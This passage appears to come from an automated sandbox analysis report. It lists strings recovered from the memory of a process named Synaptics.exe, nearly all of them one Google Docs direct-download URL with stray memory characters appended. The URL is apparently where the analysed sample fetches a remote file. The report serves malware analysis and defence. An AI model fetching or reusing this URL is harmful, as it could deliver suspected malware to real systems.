                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZf
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZo
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_?
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_aD
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_g
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_l
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_n
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada/
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada1
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada8
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadac
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadads
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadah
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadany
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadapY.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb9
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbdn.
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbiMX
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbp
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc6=
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc=
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceB
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell6
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnn
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcoTJF
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcroso
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dl
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctingsw
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.moo
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd?
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddT
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddfO_:
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade3
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin_w
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeflig
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelleme
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleU
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorati
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadouF
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                      Source: Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpany
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadphDKV_
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpr
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp~
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq-
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqjP
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqq
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqu
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqz
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...w
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadreq.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadror.
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadru)3
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads?
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsMq3
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsafe-
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse$J
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsers
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsn
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsx
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-
                                      Source: Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.net
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt8
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtM&
